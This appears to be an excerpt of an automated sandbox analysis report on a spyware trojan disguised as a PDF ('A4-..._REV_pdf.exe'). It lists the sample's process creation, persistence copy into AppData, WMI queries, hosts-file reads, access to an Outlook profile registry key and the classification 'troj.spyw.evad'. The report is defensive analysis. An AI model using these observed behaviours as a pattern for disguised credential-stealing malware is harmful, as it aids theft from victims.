                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0638581624_2_06385816
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06384CF024_2_06384CF0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_063890CB24_2_063890CB
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0638797E24_2_0638797E
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0643568724_2_06435687
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_064336B024_2_064336B0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_064345B824_2_064345B8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_064372C024_2_064372C0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0643837824_2_06438378
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0643633824_2_06436338
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0643B05024_2_0643B050
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0643807824_2_06438078
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06438E4024_2_06438E40
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06433C1824_2_06433C18
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06437DFE24_2_06437DFE
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06439A2024_2_06439A20
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_064335DA24_2_064335DA
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_064345AA24_2_064345AA
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0643421824_2_06434218
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0643422824_2_06434228
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0643836924_2_06438369
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0643B04224_2_0643B042
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06437E4924_2_06437E49
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06438E4E24_2_06438E4E
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06433C0A24_2_06433C0A
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06439A1E24_2_06439A1E
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06437B2E24_2_06437B2E
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0643993824_2_06439938
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E004031_2_016E0040
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E1F9C31_2_016E1F9C
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E000631_2_016E0006
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E30A031_2_016E30A0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E309231_2_016E3092
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E3D9031_2_016E3D90
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E2FAF31_2_016E2FAF
                      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1588
                      Source: A4-058000200390-10-14_REV_pdf.exeStatic PE information: invalid certificate
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.705986735.00000000051E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697398308.00000000010AB000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.702719345.000000000442A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameOYSP IuQ.exe2 vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.706448464.0000000005B20000.00000002.00000001.sdmpBinary or memory string: originalfilename vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.706448464.0000000005B20000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.698714228.0000000003C29000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.706578573.0000000005CF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696808510.00000000008A6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIGtzbNIQ.exe2 vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.706664295.0000000005DD0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.913106033.000000000107A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920734902.0000000006790000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918507319.0000000005F40000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewbemdisp.tlbj% vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.924161164.0000000006950000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000000.667116345.0000000000A56000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIGtzbNIQ.exe2 vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.923915829.00000000068E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.912393634.0000000000BE7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920690884.0000000006780000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918554184.0000000005F50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.912217696.0000000000448000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameOYSP IuQ.exe2 vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmpBinary or memory string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_7|
                      Source: NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbE3931}\Server
                      Source: NewApp.exe, 00000013.00000002.816014888.00000000009F0000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/16@6/3
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile created: C:\Users\user\AppData\Roaming\NewAppJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7040
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2092
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1216
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD95.tmpJump to behavior
                      Source: A4-058000200390-10-14_REV_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: A4-058000200390-10-14_REV_pdf.exeReversingLabs: Detection: 12%
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile read: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe 'C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknownProcess created: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1588
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1956
                      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1868
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess created: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: A4-058000200390-10-14_REV_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: A4-058000200390-10-14_REV_pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: NewApp.PDB source: NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbcB source: NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.673776774.0000000004C7B000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: dnsapi.pdbJ source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb` source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: ml.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: clr.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: .ni.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbjB source: NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp, NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: urlmon.pdb* source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: iVisualBasic.pdb\3 source: NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbd source: NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb@ source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb)gc}+ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: nsi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb, source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
